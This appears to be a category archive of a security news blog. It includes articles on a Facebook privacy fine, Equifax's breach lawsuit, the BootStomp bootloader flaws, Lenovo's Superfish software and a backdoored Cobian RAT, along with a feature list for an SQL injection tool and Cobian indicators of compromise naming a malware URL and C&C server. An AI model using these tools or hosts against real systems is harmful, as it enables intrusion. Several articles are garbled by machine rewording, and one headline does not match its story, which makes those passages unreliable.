Category Archives: TechNews

GlobalHackNews Is The Popular Blog of IT Security, Cybersecurity, and Latest Hacking News Update. Read Regular News to Improve Your Security.

Facebook slapped with $1.43 million fine for violating users’ privacy in Spain


Facebook slapped with $1.43 million fine for violating users' privacy in Spain
photo by :: Facebook..com

Facebook is once again in trouble regarding its users’ privacy.
The social media giant has recently been heavily fined once again for a series of privacy violations in Spain.

Recently, Google also incurred a record-breaking fine of $2.7 billion (€2.42 billion) by the European antitrust officials for unfairly manipulating search results since at least 2008.
Now, the Spanish Data Protection Agency (AEPD) has issued a €1.2 Million (nearly $1.4 Million) fine against Facebook for breaching laws designed to protect its people’s information and confidentiality.


According to the data protection watchdog, the social network collects its users’ personal data without their ‘unequivocal consent’ and makes the profit by sharing the data with advertisers and marketers.

The AEPD also found Facebook collects sensitive data on user’s ideology, religious beliefs, sex and personal tastes and navigation—either directly from its own services or through third parties—without clearly informing its users how this information would be used.

This activity constituted a “very serious” infringement of the country’s local data protection law (LOPD), for which the authority fined the company €600,000 ($718,062).

The regulator also identified two “serious” violations of privacy laws, including:
  1. Tracking people through the use of “Like” button social plug-ins embedded in other non-Facebook web pages—for which it is fined €300,000 ($359,049).
  2. Failing to delete data collected from users once it has finished using it, in fact, the company “retains and reuses it later associated with the same user”—which resulted in another €300,000 ($359,049) fines.
The AEPD also said that Facebook’s existing privacy policy contains “generic and unclear terms,” and doesn’t “adequately collect the consent of either its users or nonusers, which constitutes a serious infringement.”
“Users choose which information they want to add to their profile and share with others,” said Sally Aldous, a company spokeswoman. “We do not use this information to target adverts to people.”
While the Spanish agency has become one of the few privacy watchdogs worldwide to issue financial penalties against the social networking giant, the fine represents a mere rounding error to the company’s tens of billions of dollars of revenue generated each year.
In May, the French data protection authority also finds Facebook €150,000 — its maximum fine — for violations similar to what was discovered by its Spanish counterpart. The social network denies any wrongdoing.
Facebook has become a lightning rod for controversy over how it collects and uses people’s online information, as well as its role in disseminating potential fake news and hate speech to users around the globe

Microsoft shrugs off Windows kernel bug that can block malware detection

Microsoft shrugs off Windows kernel bug that can block malware detection

According to a write-up on security blog, Breaking Malware, the bug in the system is a coding error that affects the PsSetLoadImageNotifyRoutine, which is supposed to monitor what modules are loading.“During research into the Windows kernel, we came across an interesting issue with PsSetLoadImageNotifyRoutine which as its name implies, notifies of module loading,” explains the security firm enSilo on its blog.

Microsoft Security Response Center has been sitting on the bug all year bug in the Microsoft Windows kernel can render security tools useless by blocking the detection of malware threats by a system utility written specifically to highlight potential threats to security software
“The thing is, after registering a notification routine for loaded PE images with the kernel the callback may receive invalid image names.
“After digging into the matter, what started as a seemingly random issue proved to originate from a coding error in the Windows kernel itself. This flaw exists in the most recent Windows 10 release and past versions of the operating system, dating back to Windows 2000.”
The bug defeats the purpose of the PsSetLoadImageNotifyRoutine, which is designed to spot malware threats as they make their way through Windows. It is also rather ironic. Bleeping Computer has spoken to one of the security researchers, Omri Misgav, who said that Microsoft did not see the issue as a security problem.
“We did not test any specific security software,” Misgav told Bleeping Computer. “We are aware that some vendors do use this mechanism, however at this point in time we cannot say if and how the use of the faulty [PsSetLoadImageNotifyRoutine] information affects them.”

Samsung wants you to hack its devices and get up to $200,000

Samsung wants you to hack its devices and get up to $200,000
It’s a fact that Android is one of the most vulnerable mobile operating systems and at the same time, people around the world mostly use Samsung’s smartphones. Keeping both facts in mind; this combination makes Android devices a perfect and lucrative target for hackers and cyber criminals.
While Google is implementing security measures to tackle this threat, Samsung has launched a bug bounty program urging hackers and IT security researchers to find critical security flaws and vulnerabilities so the tech giant can fix them before malicious criminal elements get their hand on it.
In return, the company will pay between USD 200 and USD 200,000 for valid reports. An important thing to keep in mind about this bug bounty program is that Samsung will only facilitate reports demonstrating remote attacks, not the physical ones. Also, vulnerabilities found in the third-party application are not eligible for submission.
“Through this rewards program, we hope to build and maintain valuable relationships with researchers who coordinate disclosure of security issues with Samsung Mobile,” said Samsung
 Security vulnerability report must be applied to eligible Samsung Mobile devices, services, applications developed and signed by Samsung Mobile, or eligible 3rd party applications developed for Samsung.

  • Eligible Samsung Mobile Devices in their latest available Android version and firmware:

Samsung wants you to hack its devices and get up to $200,000

  • Galaxy S series (S8, S8+, S8 Active, S7, S7 edge, S7 Active, S6 edge+, S6, S6 edge, S6 Active) 
  • Galaxy Note series (Note 8, Note FE, Note 5, Note 4, Note edge)
  • Galaxy A series (A3 (2016), A3 (2017), A5 (2016), A5 (2017), A7 (2017))
  • Galaxy J series (J1 (2016), J1 Mini, J1 Mini Prime, J1 Ace, J2 (2016), J3 (2016), J3 (2017), J3 Pro, J3 Pop, J5 (2016), J5 (2017), J7 (2016), J7 (2017), J7 Max, J7 Neo, J7 Pop)
  • Galaxy Tab series (Tab S2 L Refresh, Tab S3 9.7)
“We take security and privacy issues very seriously; and as an appreciation for helping Samsung Mobile improve the security of our products and minimizing risk to our end-consumers, we are offering a rewards program for eligible security vulnerability reports,” explained Samsung.


Hackers Can Remotely Access Syringe Infusion Pumps to Deliver Fatal Overdoses

Hackers Can Remotely Access Syringe Infusion Pumps to Deliver Fatal Overdoses
As reported yesterday, the credit reporting agency Equifax was hacked by unknown attackers. Now, it is being reported that the credit giant has been slapped with a multi-billion-dollar lawsuit over the data breach in which personal details of 143 million consumers was stolen – This is over 40% of the entire population of the United States.
“Plaintiffs file this complaint as a national class action on behalf of over 140 million consumers across the Country harmed by Equifax’s failure to adequately protect their credit and personal information. This complaint requests Equifax provide fair compensation in an amount that will ensure every consumer harmed by its data breach will not be out-of-pocket for the costs of independent third-party credit repair and monitoring services,” the complaint reads.
Remember, the stolen data includes names, addresses, birth dates, driver’s license numbers, credit card numbers of 209,000 consumers and dispute documents of 182,000 U.S. consumers. The data also included details of some Canadian and British residents.
All this was possible due to a “U.S. website application vulnerability to gain access to certain files.”

In a complaint filed by plaintiffs (PDF) Brook Reinhard and Mary McHill (both had their data with Equifax) in the federal court in Portland, Oregon; Equifax has been accused of not implementing proper security measures to protect the consumer data to save money rather than spending on security
In an email conversation with Fleming Shi, SVP Technology at Barracuda Networks said that “This breach is a like a Category 5 hurricane in the cyber world, affecting at least one-third of the U.S. population. The lasting impact from the breach will go on for years. Although web applications attacks are common, there are two variations that may be relevant to this incident.”
 In one instance, a company hosts software that is vulnerable to content injection or privilege escalation attacks. This vulnerability can easily be exploited, once discovered, as not every site is setup for auto updates.
 In the second instance, web applications or website code is independently vulnerable and subject to various well application-level attacks. In such cases, if software exhibits vulnerability to common attacks like SQL injection, XSS, Buffer, or overflow, this puts an organization at serious risk.”
Previously, Experian also suffered a similar hack attack leading to the theft of 15 million T-Mobile consumers data. The data was later being sold on the dark web for as cheap as 0.8082 (USD 600.00)
“Web Applications vulnerabilities continue to be a  critical exposure for many large organizations.  Attackers have gotten more sophisticated at probing for flaws in the underlying frameworks that many of these applications are built on top of which can lead to widespread security exposures even for organizations with mature security programs and secure coding practices in place – As companies continue to pursue more rapid application development capabilities they need to ensure their security program keeps pace and travels at a similar speed,” said Mike Cotton, Vice President of Research and Development at Digital Defense, Inc.
Currently, the law enforcement authorities are investigating the issue however one cannot deny it is a difficult situation for Equifax. First the data breach and now a multibillion-dollar lawsuit.

4X Human Traffic To Your Blogger Blog In No Time

4X Human Traffic To Your Blogger Blog In No Time
Photo Credit: ShoutMeLoud.com : Harsh Agrawal sir 

A few month ago Harsh Agrawal sir showed off his page views for June 2017 and his earnings. Many persons were shocked and someone even said it’s because he has been in the game for long, to an extent TRUE but when you look at it from another perspective it’s FALSE.

Driving such huge traffic of 1.5million to your blog in a month desire you being long in the game, it also requires you to know what to do. Harsh is one of the bloggers I have seen making various research, from proper SEO optimization, to Email Marketing and now his latest trend is Push Notification.



Picking from his words ” If you are looking for one takeaway from this traffic report, it would be focusing on SEO and making sure to offer quality articles to your readers are always good things to do.

Another tip that I can give you is to take advantage of push notifications. Use PushEngage or another similar service as this could be a great source of returning traffic for you.”

For a blogger who received 1.5million page views in a month to make mention of a source and also build more on it that tells you there is power in push notification.


Photo Credit: ShoutMeLoud.comHarsh Agrawal sir 


Push Notification

No nobody read emails sincerely speaking. If I subscribed to your blog on any occasion just know I have never read any of your emails but Push Notifications are unavoidable both mobile push and browser notifications. 

So what is push notification? – These are messages sent to anyone who has accepted to receive notifications from your blog. Instead of, you sending them emails, you simply send them a preview of the post on their browser.When a user is offline, he gets to see it immediately he comes online and when he is online he sees it right away.


Push notification has been one of the die hard source of real human traffic for a blog. To test this out myself and see whether users always clicked on push notification I got myself subscribed to Entclass blog 


My Experience With Push Notification.


Entclass blog is a blog for cheats and technology so to test out how push messages work, I got subscribed to their list hoping to turn down messages but I could not prevent myself from avoiding it.

Whenever I am online, I would receive the message instantly, the compelling titles always made me click and when am offline, I meet the notification ones I log in. That experiment taught me two good things about push notification and with these 2 things you can drive in 4X of your daily blogger blog visitors.

Why your push notification setup failed!.

I have seen many Nigerian bloggers enable the push notification without even knowing how it works, at the end, they fail at it!. Getting traffic is a system that needs you to be creative and wise. There are some things you need to do, to get a head start on your competitors.

Often times we mess things up. You could easily go to one of the websites and set up push notification and at the end, you will fail. simply because you saw someone talking about it and you did not care to know how it works.


Best Push Notification Practices That Drives Traffic.


1. Market your sign in button.

By default, a pop-up box normally shows up asking your users to allow push notification and I know you think that will do the job. You are wrong!. I personally will never accept that because in the world where you have people sending others virus, hijacking bloggers etc. You expect me to just allow such a function?.

The truth here, is many of your readers don’t know what push notification is, most of them feel as if it is spam and this is why you are getting low subscribers daily.

whats the solution? – Educate your audience on it, tell them what that option would do for them and how it can help them get updated instantly, often times promote it just the same way you promote the subscribe here box because it has a potential of driving your blog thousands of daily visitors.

2. Push Titles

If you just copied and pasted the title of your post as the title of your push notification you are getting it all wrong again. Except for the title of your post have been properly optimized for power and SEO don’t use itWhat do I mean? You need a title that can convert for you.

Believe it or leave it, if your title is awful users will just close the box. You need to optimize your push title with positive power words that command people to click. Be specific, keep it short and make sure it properly describe what the blog post is simply about.


3. Daily Updates BandWidth.

The number of messages you send to my browser every day will tell whether I will remain on your list. Some bloggers can post you rubbish!. Send only the important and highly anticipated posts. Not all articles should be sent out, there are some, even you yourself knows can not stand to change to pull a crowd.

News and Gossip bloggers always find good headlines and push always work for them. Explore your blog and share even old posts as long as you know, it can pull a crowd.

2 Free Push Notification Services that actually works.

To round it all up, I will be showing you two great push notifications services that actually work.

  1. PushEngage
  2. Pushify


PushEngage

This free service is awesome and can drive millions of views daily. It is used and endorsed by ShoutMeLoud. I started with it and though not yet certain, I am still experimenting with it. PushEngage is a functional push notification service that can drive traffic from both mobile and desktop browsers.

It has many optin forms, down to a sidebar sliding “Get Notification” box that encourages your users to subscribe.

Pushify


I recently got to know about this anyway and have not used it because my template is built for AMP and don’t accept external JS. Pushify is one of the very best services with an awesome start up process though I have not used them, I believe they are good at what they do.

Push Notifications Vs FaceBook Sharing

I will keep this short because I know you would love to compare. This seems to be a huge topic which should actually be an article on its own. They both drive in traffic but now it all depends on your subscription list and also on the groups you are sharing your posts.

If you shared a post to a group of 500k persons you don’t expect a subscriber list of just 200 people to drive in more traffic.

But in terms of conversions based on percentage, Push notification converts more even more than email marketing.



More Then 143 million data hack international company :Equifax

More Then 143 million data hack international company :Equifax

As reported yesterday, the credit reporting agency Equifax was hacked by unknown attackers. Now, it is being reported that the credit giant has been slapped with a multi-billion-dollar lawsuit over the data breach in which personal details of 143 million consumers was stolen – This is over 40% of the entire population of the United States.

“Plaintiffs file this complaint as a national class action on behalf of over 140 million consumers across the Country harmed by Equifax’s failure to adequately protect their credit and personal information. This complaint requests Equifax provide fair compensation in an amount that will ensure every consumer harmed by its data breach will not be out-of-pocket for the costs of independent third-party credit repair and monitoring services,” the complaint reads.
In a complaint filed by plaintiffs (PDF) ?? Reinhard and Mary McHill (both had their data with Equifax) in the federal court in Portland, Oregon; Equifax has been accused of not implementing proper security measures to protect the consumer data to save money rather than spending on security
Remember, the stolen data includes names, addresses, birth dates, driver’s license numbers, credit card numbers of 209,000 consumers and dispute documents of 182,000 U.S. consumers. The data also included details of some Canadian and British residents.
All this was possible due to a “U.S. website application vulnerability to gain access to certain files.”
In an email conversation with Fleming Shi, SVP Technology at Barracuda Networks (https://www.barracuda.com)said that “This breach is a like a Category 5 hurricane in the cyber world, affecting at least one-third of the U.S. population. The lasting impact from the breach will go on for years. Although web applications attacks are common, there are two variations that may be relevant to this incident.”
“1: In one instance, a company hosts software that is vulnerable to content injection or privilege escalation attacks. This vulnerability can easily be exploited, once discovered, as not every site is setup for auto updates.
2: In the second instance, web applications or website code is independently vulnerable and subject to various well application-level attacks. In such cases, if software exhibits vulnerability to common attacks like SQL injection, XSS, Buffer, or overflow, this puts an organization at serious risk.”
Previously, Experian also suffered a similar hack attack leading to the theft of 15 million T-Mobile consumers data. The data was later being sold on the dark web for as cheap as 0.8082 (USD 600.00)
“Web Applications vulnerabilities continue to be a critical exposure for many large organizations. Attackers have gotten more sophisticated at probing for flaws in the underlying frameworks that many of these applications are built on top of which can lead to widespread security exposures even for organizations with mature security programs and secure coding practices in place – As companies continue to pursue more rapid application development capabilities they need to ensure their security program keeps pace and travels at a similar speed,” said Mike Cotton, Vice President of Research and Development at Digital Defense, Inc.(https://www.digitaldefense.com)
Currently, the law enforcement authorities are investigating the issue however one cannot deny it is a difficult situation for Equifax. First the data breach and now a multibillion-dollar lawsuit.

Loading…

jSQL – Automatic SQL Injection Tool for Java

 jSQL – Automatic SQL Injection Tool  for Java

jSQL is an automatic SQL Injection tool written in Java, it’s lightweight and supports 23 kinds of database.

It is free, open source and cross-platform (Windows, Linux, Mac OS X) and is easily available in Kali, Pentest Box, Parrot Security OS, ArchStrike or BlackArch Linux
Features
Automatic injection of 23 kinds of databases: Access CockroachDB
CUBRID DB2
Derby Firebird H2 Hana HSQLDB Informix Ingres MaxDB Mckoi MySQL{MariaDb} Neo4j NuoDB Oracle PostgreSQL SQLite MS SQL Server Sybase Teradata Vertica Multiple injection strategies: Normal, Error, Blind and Time SQL Engine to study and optimize SQL expressions Injection of multiple targets Search for administration pages Creation and visualisation of Web shell and SQL shell Read and write files on host using injection Bruteforce of password’s hash Code and decode a string
Installation

Install Java 8, then download the latest release of jSQL Injection and double-click on the file jsql-injection-v0.79.jar to launch the software. You can also type java -jar jsql-injection-v0.79.jar in your terminal to start the program. If you are using Kali Linux then get the latest release using commands apt update then apt full-upgrade
Future Roadmap
Netezza Support
Test coverage with Jacoco
Integration test with Docker and JPA Hibernate Jooq
Maven
Core swing CLI
Full Path Disclosure
DIOS RoutedQuery OOB UpdateInsertDelete
Bruteforce HTTP Auth using NTLM
Arabic translation
Command-line interface
Dictionary attack
WAF Detection Program self-updater


750,000 Lenovo Laptops have Spyware in them

FTC chairman Maureen Ohlhausen instructed News Tuesday whereas a teleconference that uncommon 750,000 Lenovo laptops bought in August 2014 and June 2015 arrived pre-installed with a program known as visible discovery, made by the Palo Alto, California-based agency SuperFish. The software would act as a “man-in-the-middle” inside a client’s browser and the web site folks visited.
“Imagine the online equivalent of someone, externally your knowledge, hindering your mail, opening it, reading it, resealing it and placing it back in your mailbox,” Ohlhausen stated. “That’s what we claim the software did.”
If you’re how Visual Discovery scraped person information to acquire cash, Security Firms presents this nice instance: “If you’re watching at an ad for a chest of drawers, Superfish, going by the model on its own website, can help you obtain a matching sideboard (credenza).” The software program would then “keep its eye out for similar sites, all based on models instead of relying on old-fashioned keywords.”
It would additionally maintain its eyes on client’s particular person data, like log-in creds, Social Security numbers, checking account information, medical data, and emails, researchers realized. And should you went to a “spoofed” web site, i.e., one which appeared like a furnishings retailer however was particularly data-capturing one, you’d be up a spring.
How did this mess, precisely? Superfish is a third-party service provider, and whereas Ohlhausen didn’t say that Lenovo was ignorant this software program was spying on customers, she did name on machines-makers to watch out about partnering up with entrepreneurs that may not have the most effective functions.
“Everybody in the chain wants to pay attention,” she stated. “This appeared to be one of the world’s biggest computer manufacturers and I think it sends an essential message: If you are going to install these sorts of software, you need to pay regard to what it’s collecting, what you’re saying consumers and the kinds of risks that it might be creating.”
Affected Lenovo fashions carry many in its inexpensive vary the beneath half of its vary in line with the potential criticism that Superfish was concentrating on low-revenue or younger shoppers. Included manufacturers have been the E-Series, Edge Series, Flex-Series, G-Series, Miix Series, S-Series, U-Series, Y-Series, Yoga Series, and Z-Series.

Mobile Bootloaders From Top Manufacturers Found Vulnerable to Persistent Threats

Security researchers have found a number of extreme zero-day vulnerabilities within the cellular bootloaders from at the least 4 standard machine producers that would permit an attacker to achieve persistent root entry on the machine.
A staff of 9 security researchers from the University of California Santa Barbara created a particular static binary device known as BootStomp that routinely detects security vulnerabilities in bootloaders.
Since bootloaders are normally closed and onerous to reverse-engineer, performing evaluation on them is tough, particularly as a result of dependencies hinder dynamic evaluation.

Therefore, the researchers created BootStomp, which “uses a novel combination of static analysis techniques and underconstrained symbolic execution to build a multi-tag taint analysis capable of identifying bootloader vulnerabilities.”
The device helped the researchers uncover six previously-unknown vital security bugs throughout bootloaders from HiSilicon (Huawei), Qualcomm, MediaTek, and NVIDIA, which may very well be exploited by attackers to unlock machine bootloader, set up customized malicious ROM and chronic rootkits.
Five of the vulnerabilities have already been confirmed by their respective by the chipset distributors. Researchers additionally discovered a recognized bug (CVE-2014-9798) in Qualcomm’s bootloaders, which was beforehand reported in 2014, however nonetheless current and usable.
In a analysis paper [PDF], titled “BootStomp: On the Security of Bootloaders in Mobile Devices,” introduced on the USENIX convention in Vancouver, the researchers clarify that a few of the found flaws even permit an attacker with root privileges on the Android working system to execute malicious code as a part of the bootloader or to carry out everlasting denial-of-service assaults.

According to the researchers, the vulnerabilities impression the ARM’s “Trusted Boot” or Android’s “Verified Boot” mechanisms that chip-set distributors have carried out to set up a Chain of Trust (CoT), which verifies the integrity of every part the system hundreds whereas booting the machine.

Overview: Discovered Bootloader Vulnerabilities

The researchers examined 5 totally different bootloader implementations in Huawei P8 ALE-L23 (Huawei / HiSilicon chipset), Nexus 9 (NVIDIA Tegra chipset), Sony Xperia XA (MediaTek chipset) and two variations of the LK-based bootloader, developed by Qualcomm.
The researcher found 5 vital vulnerabilities within the Huawei Android bootloader:
  • An arbitrary memory write or denial of service (DoS) challenge when parsing Linux Kernel’s DeviceTree (DTB) saved within the boot partition.
  • A heap buffer overflow challenge when studying the root-writable oem_info partition.
  • A root person’s capacity to write the nve and oem_info partitions, from which configuration information and memory entry permissions governing the smartphone’s peripherals will be learn.
  • A memory corruption challenge that would permit an attacker to set up a persistent rootkit.
  • An arbitrary memory write bug that lets an attacker run arbitrary code because the bootloader itself.
Another flaw was found in NVIDIA’s hboot, which operates at EL1, that means that it has equal privilege on the because the Linux kernel, which as soon as compromised, can lead to an attacker gaining persistence.
The researchers additionally found a recognized, already patched vulnerability (CVE-2014-9798) in previous variations of Qualcomm’s bootloader that may very well be exploited to trigger a denial of service state of affairs.
The researchers reported all of the vulnerabilities to the affected distributors. Huawei confirmed all of the 5 vulnerabilities and NVIDIA is working with the researchers on a repair.
The staff of researchers has additionally proposed a sequence of mitigations to each restrict the floor of the bootloader in addition to implement numerous fascinating properties geared toward safeguarding the security and privacy of customers.

Free Cobian RAT Offered on Underground Hacking Forums Comes With a Backdoor

 A remote access trojan (RAT) offered as a free download on underground hacking forums comes with a secret backdoor that grants the original author access to all the victim data.
This new malware strain — advertised as Cobian RAT — has been offered for free to other crooks since February 2017, according to Deepen Desai, Senior Director of Research at cyber-security firm Zscaler.
Desai says the original author is offering a ” free builder” that allows other crooks to create their own version of the Cobian RAT with customized settings.
Others took this builder, created their customized Cobian RATs, and distributed the payloads, infecting other users.

Cobian RAT backdoored using Pastebin file

Unknown to the wannabe hackers who downloaded the RAT, these customized versions secretly connect to a Pastebin URL that is under the original author’s control from where they receive new commands.
“The [Pastebin file] corresponding to the builder variant that we analyzed has 4,055 unique visitor hits till now, indicating of number of systems infected,” Desai told Bleeping Computer in an email today.
These are systems to which two crooks have access. First, the hacker who distributed the customized Cobian RAT, and then the RAT’s original author.

Cobian RAT has bugs

The good news is that Cobian is not the smash hit other free RATs were in the past. For starters, not all the features work as intended.
“In our limited testing of the keylogger module, we observed some flakiness that it was not accurately capturing all the keystrokes when [a] user types […] a little fast,” Desai told Bleeping.
This is maybe why the RAT is not as popular, despite being offered for free for almost half a year. At the time of writing, researchers have rarely seen Cobian used in the wild.
“We haven’t seen any large scale campaign involving Cobian RAT,” Desai told Bleeping, “but [we] have been seeing a few isolated incidents where it was being delivered via a compromised website.”
Nonetheless, Cobian isn’t the epic failure you’d presume. If we ignore the back door and flaky keylogger component, Cobian isn’t far behind to what competitors are offering.
“The RAT contains all the standard features available in free/paid RATs. We have listed the full set of features in our blog,” Desai added.
Despite this, the discovery of the backdoor has killed any future Cobian development, as little users will be interested or risk downloading this tool now. Below is an infographic put together by Zscaler on Cobian’s modus operandi.
********************************************************************************************************************************************************

Indicators of CompromiseMD5: 94911666a61beb59d2988c4fc7003e5a
Zip File MD5: 7eede7047d3d785db248df0870783637
Source URL: belkomsolutions[.]com/t/guangzhou%20sonicstar%20electronics%20co%20ltd.zip
C&C: swez111.ddns[.]net:20000(173.254.223.81)
FileName: GUANGZHOU SONICSTAR ELECTRONICS CO. LTD.exe
Compilation timestamp: 2017-07-11 03:53:14
Digitaly Signed: Vendor /C=FR/L=Paris/O=VideoLAN/CN=VideoLAN
Signing Date:  11:24 AM 7/14/2017

******************************************************************************************************************************************************************************************************************************